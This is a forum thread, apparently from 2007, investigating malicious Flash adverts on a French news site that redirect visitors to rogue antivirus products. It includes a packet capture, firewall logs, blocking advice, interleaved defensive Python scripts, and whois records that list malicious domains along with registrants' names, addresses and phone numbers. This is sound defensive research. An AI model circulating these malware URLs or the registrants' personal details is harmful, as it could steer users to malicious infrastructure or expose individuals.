Full Version: Flash Mystery
Kimberly
Recently many people got redirected to rogue products such as ErrorSafe, Malware-Scan, PerformanceOptimizer and Erreur Chasseur (for French people, as they are geo-location based). I got hit by such advertisements myself in my Virtual Machine while surfing on legitimate and serious websites.

<h4>
References to read
</h4>
Content of http://www.bluetack.co.uk/forums/index.php?showtopic=18044

Malicious advertisements and advertising fraud.
http://msmvps.com/blogs/spywaresucks/archi...08/1386804.aspx

The mystery (solved) of the redirect to ToolSicuro (Il mistero (svelato) della redirezione su ToolSicuro)
http://www.suspectfile.com/wblog/?p=41

Translated version of ToolSicuro using Google:
http://translate.google.com/translate?u=ht...en&ie=UTF-8

Rogue ads pushing malware -- how it works
http://sunbeltblog.blogspot.com/2007/11/ro...d-networks.html

Mike On Ads - ErrorSafe
http://www.mikeonads.com/what-is-errorsafe...-do-we-stop-it/

The article from SuspectFile explains the mechanism very well, so there isn't much to add. Most people in the spyware community got intrigued, myself included. Below is a small summary of the investigation I started yesterday, but the main purpose of this article will be:

Can I protect myself from these adverts?

Ready for a flashy ride? Ok let's take off ...

Unless you know what you're doing or have a VM handy, don't play with this please.

<h4>
Step 1 - Getting infected again
</h4>
Since I know where I got the malicious swf file, it didn't take much time to get infected again. I was simply reading the news on a French website. So fasten your seat belts and let's surf over there again but this time with Ethereal running since we must trace the connections. Take off to Le Nouvel Observateur. Since adverts are rotating, it might take a couple of minutes to get the swf file, so let’s follow a few links on the main page. It took only a few mouse clicks to obtain the desired result. In the middle of reading a chapter, my Internet Browser sort of “vanished” and PerformanceOptimizer was all there was left on my desktop.

[screenshot]
Clicking Ok or Cancel doesn't really matter ...
BTW, nice imitation of My Computer ... those guys are really inventive.

[screenshot]
Back, Next, Cancel .... your choice. All roads lead to Rome.

[screenshot]
Let's move on to the next part.

<h4>
Step 2 - Tracking the advert
</h4>
This part is time consuming as it does involve quite some reading. The firewall log may help to narrow things down, in other words to spot the link that is responsible for the infection.
I knew I had to search for newbieadguide(dot)com and performanceoptimizer(dot)com, but that wasn’t enough to understand everything.
The Ethereal log shows an interesting detail called Referer.

CODE
Frame 9319 (477 bytes on wire, 477 bytes captured)
Internet Protocol, Src: 192.168.x.x (192.168.x.x), Dst: newbieadguide.com (217.150.254.40)
Transmission Control Protocol, Src Port: 2105 (2105), Dst Port: http (80), Seq: 1, Ack: 1, Len: 423
Hypertext Transfer Protocol
    GET /statsa.php?u=23423424&campaign=c0pperin HTTP/1.1\r\n
    Accept: */*\r\n
    Accept-Language: en-US\r\n
    Referer: http://uniprix.nouvelobs.com/RealMedia/ads/Creatives/OasDefault/NO_TEXBOOKX_MBAN_1107//textbookx_728x90.swf?clickTag=http://uniprix.nouvelob\r\n
    x-flash-version: 9,0,115,0\r\n
    ~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~\r\n
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n
    Host: newbieadguide.com\r\n
    Connection: Keep-Alive\r\n
    \r\n

Looks like we have found our culprit.

<h4>
Step 3 - Trying to assemble the puzzle
</h4>
File: textbookx_728x90.swf shows 100% clean at Virustotal.

Below are 2 screenshots of the swf file showing a part of its code using 2 different programs.

It has some encrypted? obfuscated? action scripts in it, way beyond my skills to decode that. Looks like SWF Encrypt was used to obfuscate the code.
You’ll find some details on its content and how it triggers in the write-up made by SuspectFile.

[screenshot]

[screenshot]
See the mention Protected & Encrypted.
[screenshot]
Next “links in the chain” are the following web sites, taken from the firewall log:

CODE
12/11/2007 4:15:39 AM,http://newbieadguide.com/swf/gnida.swf?campaign=c0pperin&u=23423424
12/11/2007 4:15:38 AM,http://newbieadguide.com/statsg.php?u=23423424&campaign=c0pperin
12/11/2007 4:15:38 AM,http://newbieadguide.com/statsa.php?u=23423424&campaign=c0pperin

Note: Read up from bottom to top for chronological order.
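To show how the two logs above can be tied together, here is an added Python example (not the poster's tooling): it parses firewall log lines in the format quoted above, restores chronological order, flags hosts on a watchlist of the domains named in this thread, and pulls the Referer out of the captured request so the creative that triggered the tracking call is named. The sample log and request are constructed after the ones quoted; the watchlist and the function names are my own choices.

```python
"""Reconstruct a redirect chain from a firewall URL log and a captured HTTP
request. Added example for this thread, not the poster's own tooling; the
sample data below is constructed after the log and capture quoted above."""
from datetime import datetime
from urllib.parse import urlsplit

# Constructed sample, same format as the firewall log quoted above
# (newest entry first, as the post notes).
FIREWALL_LOG = """\
12/11/2007 4:15:39 AM,http://newbieadguide.com/swf/gnida.swf?campaign=c0pperin&u=23423424
12/11/2007 4:15:38 AM,http://newbieadguide.com/statsg.php?u=23423424&campaign=c0pperin
12/11/2007 4:15:38 AM,http://newbieadguide.com/statsa.php?u=23423424&campaign=c0pperin
12/11/2007 4:15:37 AM,http://uniprix.nouvelobs.com/RealMedia/ads/Creatives/OasDefault/NO_TEXBOOKX_MBAN_1107//textbookx_728x90.swf
"""

# Constructed sample: the request as Ethereal shows it, unrelated headers dropped.
HTTP_REQUEST = (
    "GET /statsa.php?u=23423424&campaign=c0pperin HTTP/1.1\r\n"
    "Referer: http://uniprix.nouvelobs.com/RealMedia/ads/Creatives/OasDefault/"
    "NO_TEXBOOKX_MBAN_1107//textbookx_728x90.swf?clickTag=http://uniprix.nouvelob\r\n"
    "x-flash-version: 9,0,115,0\r\n"
    "Host: newbieadguide.com\r\n"
    "\r\n"
)

# Domains this thread names as part of the redirect chain (assumed watchlist).
WATCHLIST = {"newbieadguide.com", "performanceoptimizer.com"}


def parse_firewall_log(text):
    """Return (timestamp, url) tuples in chronological order."""
    entries = []
    for line in text.splitlines():
        if not line.strip():
            continue
        stamp, url = line.split(",", 1)
        entries.append((datetime.strptime(stamp, "%m/%d/%Y %I:%M:%S %p"), url))
    # The file is newest-first; reverse it, then a stable sort keeps
    # same-second entries in their true order.
    entries.reverse()
    return sorted(entries, key=lambda e: e[0])


def parse_request_headers(raw):
    """Split a raw HTTP request into (request line, {lower-case name: value})."""
    head, _, _ = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def registered_domain(host):
    """Crude 'example.com' from 'sub.example.com' (enough for .com/.net)."""
    return ".".join(host.lower().split(".")[-2:])


def watchlist_hits(log_entries, watchlist=WATCHLIST):
    """URLs whose host (or parent domain) is on the watchlist, in order."""
    hits = []
    for _, url in log_entries:
        host = urlsplit(url).hostname or ""
        if host in watchlist or registered_domain(host) in watchlist:
            hits.append(url)
    return hits


def referer_chain(raw_request):
    """Name the creative (Referer) that caused the request to the tracker."""
    request_line, headers = parse_request_headers(raw_request)
    ref = urlsplit(headers.get("referer", ""))
    return {
        "from_host": ref.hostname,
        "from_path": ref.path.rsplit("/", 1)[-1],
        "to_host": headers.get("host"),
        "to_path": request_line.split(" ")[1].split("?")[0],
        "flash_version": headers.get("x-flash-version"),
    }


if __name__ == "__main__":
    for url in watchlist_hits(parse_firewall_log(FIREWALL_LOG)):
        print("watchlist hit:", url)
    print(referer_chain(HTTP_REQUEST))
```

The Referer is the key field: the firewall log alone shows traffic to newbieadguide.com but not which banner on the legitimate site started it, while the capture names textbookx_728x90.swf as the origin of the first statsa.php call.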

I will not detail those elements; only post them for historical purposes. If you really feel bored, you can always take a peek at the code of the php pages.

newbieadguide.com/statsa.php
[attachmentid=767]

newbieadguide.com/statsg.php
[attachmentid=768]

"Chameleon" in gnida.swf (referred to by SuspectFile).
[screenshot]

Action script from gnida.swf
[attachmentid=769]
<h4>
Tools used
</h4>
Flash Decompiler Trillix
http://www.decompiler-swf.com

Sothink SWF Decompiler
http://www.sothink.com/product/flashdecompiler/

Flare
http://www.nowrap.de/flare.html

SWF Encrypt™ 4.0
http://www.amayeta.com/

Ethereal
http://www.ethereal.com
Kimberly
Can I protect myself from these adverts?

Hundreds of domains are “serving” this crap. So what's the miracle solution? I’m sorry, I can’t offer the perfect way of handling this. I can simply suggest a few measures.

<h4>
The HOSTS file
</h4>
You won’t get redirected to any of the sites included in the file. Thus by adding newbieadguide.com and all the other "known" domains, you will still be able to see the initial flash advert, but you won't get redirected to the rogue site.
The con of this approach is the "unknown" domains. New domains are probably ready to serve the same redirects, and before they are spotted many innocent people will be hit over and over again. But it does help a little bit.
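An added Python example (not the poster's own list or tooling) that builds HOSTS entries for the domains this thread names and checks whether a given URL would be caught. It also shows the limit that matters here: HOSTS matching is exact, so a parent domain in the file does not cover a new subdomain such as scanner2.malware-scan.com, which this thread later lists on its own server. The sink address and function names are my choices.

```python
"""HOSTS-file blocklist helpers. Added example for this thread, not the
poster's tooling; the domains are the ones named in the thread."""
from urllib.parse import urlsplit

# Hostnames named in this thread as part of the rogue chain.
BLOCKLIST = [
    "newbieadguide.com",
    "performanceoptimizer.com",
    "malware-scan.com",
]


def hosts_entries(domains, sink="0.0.0.0"):
    """One HOSTS line per hostname. Matching is exact, so the bare domain and
    its www. form each get a line; 0.0.0.0 is an unroutable sink address
    (assumed choice; 127.0.0.1 is the other common one)."""
    lines = []
    for d in domains:
        d = d.lower().strip(".")
        lines.append(f"{sink} {d}")
        if not d.startswith("www."):
            lines.append(f"{sink} www.{d}")
    return "\n".join(dict.fromkeys(lines)) + "\n"


def parse_hosts(text):
    """Set of hostnames a HOSTS file overrides, ignoring comments."""
    blocked = set()
    for line in text.splitlines():
        fields = line.split("#", 1)[0].split()
        if len(fields) >= 2:
            blocked.update(h.lower() for h in fields[1:])
    return blocked


def is_blocked(url, hosts_text):
    """True only on an exact hostname match, which is how HOSTS works."""
    host = (urlsplit(url).hostname or "").lower()
    return host in parse_hosts(hosts_text)


def uncovered_subdomains(urls, hosts_text):
    """Hosts that slip past HOSTS because only their parent domain is listed:
    the 'unknown domains' gap the post describes, one level down."""
    blocked = parse_hosts(hosts_text)
    out = []
    for u in urls:
        host = (urlsplit(u).hostname or "").lower()
        parent = ".".join(host.split(".")[-2:])
        if host not in blocked and parent in blocked:
            out.append(host)
    return out


if __name__ == "__main__":
    hosts = hosts_entries(BLOCKLIST)
    print(hosts)
    print(is_blocked("http://newbieadguide.com/statsa.php", hosts))
    print(uncovered_subdomains(["http://scanner2.malware-scan.com/"], hosts))
```

Each subdomain that shows up in a new capture has to be added explicitly; a blocker that understands domain suffixes (the firewall or browser add-on approaches below) closes that gap where HOSTS cannot.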

<h4>
Firewall
</h4>
If you have a firewall with ad blocking capacities, activate them. Most of them block banners if they meet some conditions based upon size, keywords, etc … It isn’t perfect but it surely helps.

[screenshot]

[screenshot]
<h4>
Manage Add-ons in Internet Explorer
</h4>
Open up Internet Explorer and select Tools > Manage Add-ons.
Depending on your Internet Explorer version, the options might vary a bit. Either look under Add-ons currently loaded in Internet Explorer or under Add-ons that have been used by Internet Explorer. IE7 has an additional option too.

Select the Shockwave Flash Object and set its status to disabled. OK the boxes and restart Internet Explorer as required.
[screenshot]
Internet Explorer 8
[screenshot]
Internet Explorer add-ons: frequently asked questions
http://windowshelp.microsoft.com/Windows/e...df9b7e1033.mspx

How to Configure Enhanced Security Features for Internet Explorer from Windows XP SP2
http://www.microsoft.com/technet/security/...xp/iesecxp.mspx

How to manage Internet Explorer add-ons in Windows XP Service Pack 2
http://support.microsoft.com/kb/883256

Add-on Management Improvements in Internet Explorer 8
http://blogs.msdn.com/ie/archive/2008/03/2...explorer-8.aspx

<h4>
NoScript for Firefox
</h4>
Install NoScript for Firefox if not yet done.
Right click the icon in the status bar and select Options.

[screenshot]
Put a checkmark next to Forbid Macromedia Flash. I would recommend checking Apply these restrictions to trusted sites too. If you only have a few trusted sites then you might leave that unchecked. Everything depends on your other settings.

[screenshot]
More information can be found at the NoScript website.

While you are installing plugins and securing Firefox, you might also add AdblockPlus on your ToDo list.

<h4>
Setting the "killbit" for Flash
</h4>
If you don’t want to mess around with the Internet Explorer Add-ons or Noscript, you can always set the killbit for Shockwave.

You can perform this task in various ways:

Of course, with the last 3 methods you won’t be able to see Flash animations no matter what webpage you visit. But that’s a very small price to stay protected imo.

<h4>
Uninstall Flash
</h4>
How to uninstall the Adobe Flash Player plug-in and ActiveX control

Other Flash related links:

Now it's up to you all. Happy surf.
Kimberly
On 17 December I received a positive response from the Nouvel Observateur, the banner was removed from the website.

Several banners are still active and present on internet, so webmasters take your responsibilities and take them down please. In doubt get them analysed and contribute to keep internet clean & safe.
Kimberly
As mentioned above, people are redirected based upon their geo location. The list below reflects the main domains and their "associated" IPs / domains. The redirects I did stumble on during tests are listed in red (main domains not included).
The list is still a work in progress and I'll keep it updated as much as possible.

<h4>
Main domains
</h4>
newbieadguide.com - 217.150.254.40

Server Type: Apache
IP Location - Switzerland - Nine Internet Solutions Ag
Dedicated Hosting: newbieadguide.com is hosted on a dedicated server.

Record last updated on 24-Apr-2007.
Record expires on 20-Apr-2008.
Record created on 20-Apr-2007.

Domain servers in listed order:
NS2.NEWBIEADGUIDE.COM 190.15.73.252
NS1.NEWBIEADGUIDE.COM 190.15.73.251
______________________________

vozemiliogaranon.com - 217.150.254.41

Server Type: Apache
IP Location - Switzerland - Pc Ions Incorporation

Domain Name : vozemiliogaranon.com

::Registrant::
Name : Vozemiliogaranon
Email : mail(at)vozemiliogaranon.com
Address : kit street 56 Norn
Zipcode : 54451
Nation : BE
Tel : 54544
Fax :

::Administrative Contact::
Name : Vozemiliogaranon
Email : mail(at)vozemiliogaranon.com
Address : kit street 56 Norn
Zipcode : 54451
Nation : BE
Tel : 54544
Fax :

::Technical Contact::
Name : Vozemiliogaranon
Email : mail(at)vozemiliogaranon.com
Address : kit street 56 Norn
Zipcode : 54451
Nation : BE
Tel : 54544
Fax :

::Name Servers::
ns1.vozemiliogaranon.com
ns2.vozemiliogaranon.com
ns3.vozemiliogaranon.com
ns4.vozemiliogaranon.com

::Dates & Status::
Created Date 2007-11-23 04:58:49 EST
Updated Date 2007-11-23 04:58:49 EST
Valid Date 2008-11-23 04:58:49 EST
Status ACTIVE
______________________________

thetechnorati.com - 217.150.254.44

Server Type: Apache
IP Location - Switzerland - Nine Internet Solutions Ag

Error Message
There was an error processing your request.

Domain History
Cache Date: 2007-12-07
Domain Name : thetechnorati.com

::Registrant::
Name : Thetechnorati
Email : mail(at)thetechnorati.com
Address : Notr str 89
Zipcode : 7PO78
Nation : DK
Tel : 4554
Fax :

::Administrative Contact::
Name : Thetechnorati
Email : mail(at)thetechnorati.com
Address : Notr str 89
Zipcode : 7PO78
Nation : DK
Tel : 4554
Fax :

::Technical Contact::
Name : Thetechnorati
Email : mail(at)thetechnorati.com
Address : Notr str 89
Zipcode : 7PO78
Nation : DK
Tel : 4554
Fax :

::Name Servers::
ns1.thetechnorati.com
ns2.thetechnorati.com
ns3.thetechnorati.com
ns4.thetechnorati.com

::Dates & Status::
Created Date 2007-11-23 05:13:25 EST
Updated Date 2007-11-23 05:13:25 EST
Valid Date 2008-11-23 05:13:25 EST
Status ACTIVE
______________________________

akamahi.net - 217.150.254.45

Server Type: Apache
IP Location - Switzerland - Nine Internet Solutions Ag

Error Message
There was an error processing your request.

Domain History
Cache Date: 2007-12-23
Domain Name : akamahi.net

::Registrant::
Name : Akamahi
Email : mail@akamahi.net
Address : Lion str 45
Zipcode : 5651
Nation : CR
Tel : 45445
Fax :

::Administrative Contact::
Name : Akamahi
Email : mail@akamahi.net
Address : Lion str 45
Zipcode : 5651
Nation : CR
Tel : 45445
Fax :

::Technical Contact::
Name : Akamahi
Email : mail@akamahi.net
Address : Lion str 45
Zipcode : 5651
Nation : CR
Tel : 45445
Fax :

::Name Servers::
ns1.akamahi.net
ns2.akamahi.net
ns3.akamahi.net
ns4.akamahi.net

::Dates & Status::
Created Date 2007-11-23 05:18:08 EST
Updated Date 2007-11-23 05:18:08 EST
Valid Date 2008-11-23 05:18:08 EST
Status ACTIVE
______________________________

adtraff.com - 84.243.252.84

Server Type: nginx/0.4.13
IP Location - Netherlands - Gfx-cust-worldstream
Dedicated Hosting: adtraff.com is hosted on a dedicated server.

Record last updated on 02-Nov-2007.
Record expires on 13-Apr-2008.
Record created on 13-Apr-2007.

Domain servers in listed order:
NS1.ADTRAFF.COM 190.15.73.251
NS2.ADTRAFF.COM 190.15.73.252
______________________________

burnads.com - 84.243.252.85

Server Type: nginx/0.4.13
IP Location - Netherlands - Gfx-cust-worldstream
Dedicated Hosting: burnads.com is hosted on a dedicated server.

Error Message
There was an error processing your request.

Domain History
Cache Date: 2007-12-11
Domain Name : burnads.com

::Registrant::
Name : Ines Hadden
Email : burnads_c(at)yahoo.com
Address : 48, boulevard de Port Royal, Paris
Zipcode : 75005
Nation : FR
Tel : 164233375
Fax :

::Administrative Contact::
Name : Ines Hadden
Email : burnads_c(at)yahoo.com
Address : 48, boulevard de Port Royal, Paris
Zipcode : 75005
Nation : FR
Tel : 164233375
Fax :

::Technical Contact::
Name : Ines Hadden
Email : burnads_c(at)yahoo.com
Address : 48, boulevard de Port Royal, Paris
Zipcode : 75005
Nation : FR
Tel : 164233375
Fax :

::Name Servers::
ns1.burnads.com
ns2.burnads.com

::Dates & Status::
Created Date 2006-06-29 05:33:08 EDT
Updated Date 2007-06-27 17:54:41 EDT
Valid Date 2008-06-29 05:33:08 EDT
Status ACTIVE
______________________________

mysurvey4u.com - uniqads.com - traffalo.com - traveltray.com - 190.15.73.254

Server Type: lighttpd/1.4.13
IP Location - Francisco Morazan - Tegucigalpa - Secure Hosting Ltd
Reverse IP: 107 other sites hosted on this server.


mysurvey4u.com

Error Message
There was an error processing your request.

Domain History
Cache Date: 2007-12-14
Domain Name : mysurvey4u.com

::Registrant::
Name : MARKUS MCCOY
Email : mysurvey_4u(at)yahoo.com
Address : 5th Hancock Ave, Murrieta CA
Zipcode : 25405
Nation : US
Tel : 951-461-2785
Fax :

::Administrative Contact::
Name : MARKUS MCCOY
Email : mysurvey_4u(at)yahoo.com
Address : 5th Hancock Ave, Murrieta CA
Zipcode : 25405
Nation : US
Tel : 951-461-2785
Fax :

::Technical Contact::
Name : MARKUS MCCOY
Email : mysurvey_4u(at)yahoo.com
Address : 5th Hancock Ave, Murrieta CA
Zipcode : 25405
Nation : US
Tel : 951-461-2785
Fax :

::Name Servers::
ns1.mysurvey4u.com
ns2.mysurvey4u.com

::Dates & Status::
Created Date 2006-12-04 09:57:28 EST
Updated Date 2007-12-03 20:06:35 EST
Valid Date 2008-12-04 09:57:28 EST
Status ACTIVE


uniqads.com

Record last updated on 08-Jun-2007.
Record expires on 27-Apr-2008.
Record created on 27-Apr-2007.

Domain servers in listed order:
NS2.UNIQADS.COM 190.15.73.252
NS1.UNIQADS.COM 190.15.73.251


traffalo.com

Record last updated on 26-Apr-2007.
Record expires on 13-Apr-2008.
Record created on 13-Apr-2007.

Domain servers in listed order:
NS1.TRAFFALO.COM 190.15.73.251
NS2.TRAFFALO.COM 190.15.73.252


traveltray.com

Record last updated on 02-Jun-2007.
Record expires on 01-Jul-2008.
Record created on 01-Jul-2004.

Domain servers in listed order:
NS1.TRAVELTRAY.COM 190.15.73.251
NS2.TRAVELTRAY.COM 190.15.73.252

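The hosting and whois details above can be turned into the kind of relationship map the next part of the post lists. This added Python example (not the poster's tooling) transcribes the quoted records and pivots on two signals visible in them: domains hosted in the same /24 at the same provider, and domains sharing a name-server set. Name servers the whois output lists only by hostname are kept as hostnames; the function names and the /24 choice are mine.

```python
"""Pivot on shared hosting and name-server infrastructure. Added example for
this thread, not the poster's tooling; RECORDS is transcribed from the
whois/hosting details quoted in the post."""
import ipaddress
from collections import defaultdict, deque

# (domain, hosting IP, server banner, name servers) as quoted above.
RECORDS = [
    ("newbieadguide.com", "217.150.254.40", "Apache",
     {"190.15.73.251", "190.15.73.252"}),
    ("vozemiliogaranon.com", "217.150.254.41", "Apache",
     {f"ns{i}.vozemiliogaranon.com" for i in range(1, 5)}),
    ("thetechnorati.com", "217.150.254.44", "Apache",
     {f"ns{i}.thetechnorati.com" for i in range(1, 5)}),
    ("akamahi.net", "217.150.254.45", "Apache",
     {f"ns{i}.akamahi.net" for i in range(1, 5)}),
    ("adtraff.com", "84.243.252.84", "nginx/0.4.13",
     {"190.15.73.251", "190.15.73.252"}),
    ("burnads.com", "84.243.252.85", "nginx/0.4.13",
     {"ns1.burnads.com", "ns2.burnads.com"}),
    ("mysurvey4u.com", "190.15.73.254", "lighttpd/1.4.13",
     {"ns1.mysurvey4u.com", "ns2.mysurvey4u.com"}),
    ("uniqads.com", "190.15.73.254", "lighttpd/1.4.13",
     {"190.15.73.251", "190.15.73.252"}),
    ("traffalo.com", "190.15.73.254", "lighttpd/1.4.13",
     {"190.15.73.251", "190.15.73.252"}),
    ("traveltray.com", "190.15.73.254", "lighttpd/1.4.13",
     {"190.15.73.251", "190.15.73.252"}),
]


def netblock(ip, prefix=24):
    """The /prefix network an address sits in, e.g. 217.150.254.0/24."""
    return str(ipaddress.ip_network(f"{ip}/{prefix}", strict=False))


def group_by_netblock(records, prefix=24):
    """Domains hosted in the same block: adjacent addresses at one provider
    are a strong hint that one operator rented them together."""
    groups = defaultdict(list)
    for domain, ip, _, _ in records:
        groups[netblock(ip, prefix)].append(domain)
    return {block: sorted(d) for block, d in groups.items()}


def group_by_nameservers(records):
    """Domains with an identical name-server set (groups of two or more)."""
    groups = defaultdict(list)
    for domain, _, _, ns in records:
        groups[frozenset(ns)].append(domain)
    return {ns: sorted(d) for ns, d in groups.items() if len(d) > 1}


def cluster(records, seed, prefix=24):
    """Every domain reachable from `seed` by repeatedly following
    'same netblock' and 'shares a name server' links (breadth-first)."""
    by_domain = {d: (ip, ns) for d, ip, _, ns in records}
    seen, queue = {seed}, deque([seed])
    while queue:
        cur_ip, cur_ns = by_domain[queue.popleft()]
        for other, (ip, ns) in by_domain.items():
            if other in seen:
                continue
            same_block = netblock(ip, prefix) == netblock(cur_ip, prefix)
            if same_block or (ns & cur_ns):
                seen.add(other)
                queue.append(other)
    return sorted(seen)


if __name__ == "__main__":
    for block, domains in group_by_netblock(RECORDS).items():
        print(block, domains)
    print("linked to newbieadguide.com:", cluster(RECORDS, "newbieadguide.com"))
```

Starting from newbieadguide.com alone, the two links chain through the Swiss /24, the 190.15.73.251/.252 name servers and then the Dutch /24, pulling in all ten domains; that is the same picture the "Closest Relationships" lists below draw from mail-server and name-server sharing.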
<h4>
Closest Relationships
</h4>
newbieadguide.com

domains sharing mailservers
  • ad2cash.net
  • adtraff.com
  • bucksbill.com
  • burnads.com
  • cryptdrive.com
  • deuscleanerpay.com
  • errordigger.com
  • errorinspector.com
  • fileprotector.com
  • forceup.com
  • freetvnow.net
  • netmediagroup.net
  • netturbopro.com
  • opensols.com
  • popupnukerpro.com
  • sellmoresoft.net
  • sellmysoft.net
  • traffalo.com
  • unicsearch.com
  • uniqads.com
  • windefender.com
  • zappinads.com
domains sharing nameservers
  • ad2cash.net
  • adcomatoz.com
  • adtraff.com
  • b2adz.com
  • blessedads.com
  • bucksbill.com
  • burnads.com
  • cryptdrive.com
  • fileprotector.com
  • forceup.com
  • freetvnow.net
  • megashopcity.com
  • mysurvey4u.com
  • netmediagroup.net
  • netturbopro.com
  • popadprovider.com
  • popupnukerpro.com
  • prevedmarketing.com
  • r2d2adverising.com
  • sellmoresoft.net
  • sellmysoft.net
  • shivanetworking.com
  • traffalo.com
  • traveltray.com
  • unicsearch.com
  • uniqads.com
  • upg-soft.net
  • windefender.com
  • yourshopz.com
  • zappinads.com
subdomains
  • mail.newbieadguide.com
  • ns1.newbieadguide.com
  • ns2.newbieadguide.com
  • www.newbieadguide.com
______________________________

vozemiliogaranon.com

domains sharing nameservers
  • advancedcleaner.com
  • akamahi.net
  • antispywaresuite.com
  • antiviruspcsuite.com
  • bestsellerantivirus.com
  • diskretter.com
  • elmejorantivirus.com
  • erreurchasseur.com
  • exterminadordevirus.com
  • moncontenuassistant.com
  • schijfbewaker.com
  • securepccleaner.com
  • spyguardpro.com
  • storageprotector.com
  • systemdoctor.com
  • thetechnorati.com
  • toolsicuro.com
subdomains
  • ns1.vozemiliogaranon.com
  • ns2.vozemiliogaranon.com
  • ns3.vozemiliogaranon.com
  • ns4.vozemiliogaranon.com
______________________________

thetechnorati.com

domains sharing nameservers
  • advancedcleaner.com
  • antispywaresuite.com
  • antiviruspcsuite.com
  • bestsellerantivirus.com
  • diskretter.com
  • elmejorantivirus.com
  • erreurchasseur.com
  • exterminadordevirus.com
  • moncontenuassistant.com
  • schijfbewaker.com
  • securepccleaner.com
  • spyguardpro.com
  • storageprotector.com
  • systemdoctor.com
  • toolsicuro.com
  • vozemiliogaranon.com
subdomains
  • ns1.thetechnorati.com
  • ns2.thetechnorati.com
  • ns3.thetechnorati.com
  • ns4.thetechnorati.com
______________________________

akamahi.net

domains sharing nameservers
  • advancedcleaner.com
  • antispywaresuite.com
  • antiviruspcsuite.com
  • bestsellerantivirus.com
  • diskretter.com
  • elmejorantivirus.com
  • erreurchasseur.com
  • exterminadordevirus.com
  • moncontenuassistant.com
  • schijfbewaker.com
  • securepccleaner.com
  • spyguardpro.com
  • storageprotector.com
  • systemdoctor.com
  • thetechnorati.com
  • toolsicuro.com
  • vozemiliogaranon.com
subdomains
  • ns1.akamahi.net
  • ns2.akamahi.net
  • ns3.akamahi.net
  • ns4.akamahi.net
______________________________

mysurvey4u.com

hostnames sharing ip with a-records
  • ns1.1downlinebuilder.info
  • ns2.1downlinebuilder.info
domains sharing mailservers
  • advancedcleaner.com
  • boysmag.net
  • crazycinema.net
  • gaychoice.net
  • globalsoftcash.net
  • iseekporn.net
  • traveltray.com
  • videosexygirls.net
  • viragehosting.com
domains using this as nameserver
  • 1downlinebuilder.info
domains sharing nameservers
  • ad2cash.net
  • adcomatoz.com
  • adtraff.com
  • b2adz.com
  • blessedads.com
  • bucksbill.com
  • burnads.com
  • cryptdrive.com
  • fileprotector.com
  • forceup.com
  • freetvnow.net
  • megashopcity.com
  • netmediagroup.net
  • netturbopro.com
  • newbieadguide.com
  • popadprovider.com
  • popupnukerpro.com
  • prevedmarketing.com
  • r2d2adverising.com
  • sellmoresoft.net
  • sellmysoft.net
  • shivanetworking.com
  • traffalo.com
  • traveltray.com
  • unicsearch.com
  • uniqads.com
  • upg-soft.net
  • windefender.com
  • yourshopz.com
  • zappinads.com
______________________________

traveltray.com

hostnames sharing ip with a-records
  • ns2.1easy-breezy.info
domains sharing mailservers
  • advancedcleaner.com
  • boysmag.net
  • crazycinema.net
  • gaychoice.net
  • globalsoftcash.net
  • iseekporn.net
  • mysurvey4u.com
  • videosexygirls.net
  • viragehosting.com
domains using this as nameserver
  • 1easy-breezy.info
domains sharing nameservers
  • ad2cash.net
  • adcomatoz.com
  • adtraff.com
  • b2adz.com
  • blessedads.com
  • bucksbill.com
  • burnads.com
  • cryptdrive.com
  • fileprotector.com
  • forceup.com
  • freetvnow.net
  • megashopcity.com
  • mysurvey4u.com
  • netmediagroup.net
  • netturbopro.com
  • newbieadguide.com
  • popadprovider.com
  • popupnukerpro.com
  • prevedmarketing.com
  • r2d2adverising.com
  • sellmoresoft.net
  • sellmysoft.net
  • shivanetworking.com
  • traffalo.com
  • unicsearch.com
  • uniqads.com
  • upg-soft.net
  • windefender.com
  • yourshopz.com
  • zappinads.com
______________________________

uniqads.com - traffalo.com - burnads.com

domains sharing mailservers
  • ad2cash.net
  • adtraff.com
  • bucksbill.com
  • burnads.com
  • cryptdrive.com
  • deuscleanerpay.com
  • errordigger.com
  • errorinspector.com
  • fileprotector.com
  • forceup.com
  • freetvnow.net
  • netmediagroup.net
  • netturbopro.com
  • newbieadguide.com
  • opensols.com
  • popupnukerpro.com
  • sellmoresoft.net
  • sellmysoft.net
  • traffalo.com
  • unicsearch.com
  • windefender.com
  • zappinads.com
domains sharing nameservers
  • ad2cash.net
  • adcomatoz.com
  • adtraff.com
  • b2adz.com
  • blessedads.com
  • bucksbill.com
  • burnads.com
  • cryptdrive.com
  • fileprotector.com
  • forceup.com
  • freetvnow.net
  • megashopcity.com
  • mysurvey4u.com
  • netmediagroup.net
  • netturbopro.com
  • newbieadguide.com
  • popadprovider.com
  • popupnukerpro.com
  • prevedmarketing.com
  • r2d2adverising.com
  • sellmoresoft.net
  • sellmysoft.net
  • shivanetworking.com
  • traffalo.com
  • traveltray.com
  • unicsearch.com
  • upg-soft.net
  • windefender.com
  • yourshopz.com
  • zappinads.com
<h4>
190.15.73.254
</h4>
  1. Ad2cash.net
  2. Ad2profit.com
  3. Adcomatoz.com
  4. Adgurman.com
  5. Adhokuspokus.com
  6. Adnetserver.com
  7. Adredired.com
  8. Adsolutio.com
  9. Adverdaemon.com
  10. Adverlounge.com
  11. Adzyclon.com
  12. Antivirussecuritypro.com
  13. Astalaprofit.com
  14. B2adz.com
  15. Bestadmedia.com
  16. Bestpharmacydeals.com
  17. Bestsearchnet.com
  18. Bestshopz.com
  19. Bestwnvmovies.com
  20. Bizadverts.com
  21. Bizmarketads.com
  22. Blessedads.com
  23. Brandmarketads.com
  24. Bucksinsoft.com
  25. Cancerno.com
  26. Cashloanprofit.com
  27. Casinoaceking.com
  28. Casinodealsgalore.com
  29. Cheap-auto-deals.com
  30. Co-search.com
  31. Deuscleanerpay.com
  32. Easybestdeals.com
  33. Eroticabsolute.com
  34. Fantazybill.com
  35. Favouriteshop.com
  36. Fileprotector.com
  37. Freepcsecure.com
  38. Freetvnow.net
  39. Friedads.com
  40. Getfreecar.com
  41. Glorymarkets.com
  42. Great4mac.com
  43. Greyhathosting.com
  44. Hebooks-service.com
  45. Iddqdmarketing.com
  46. Infyte.com
  47. Installprovider.com
  48. Internetadaultfriend.com
  49. Intervarioclick.com
  50. Invulnerableads.com
  51. Keywordcpv.com
  52. Libresystm.com
  53. Luckyadcoin.com
  54. Luckyadsols.com
  55. Magicsearcher.com
  56. Manage-search.com
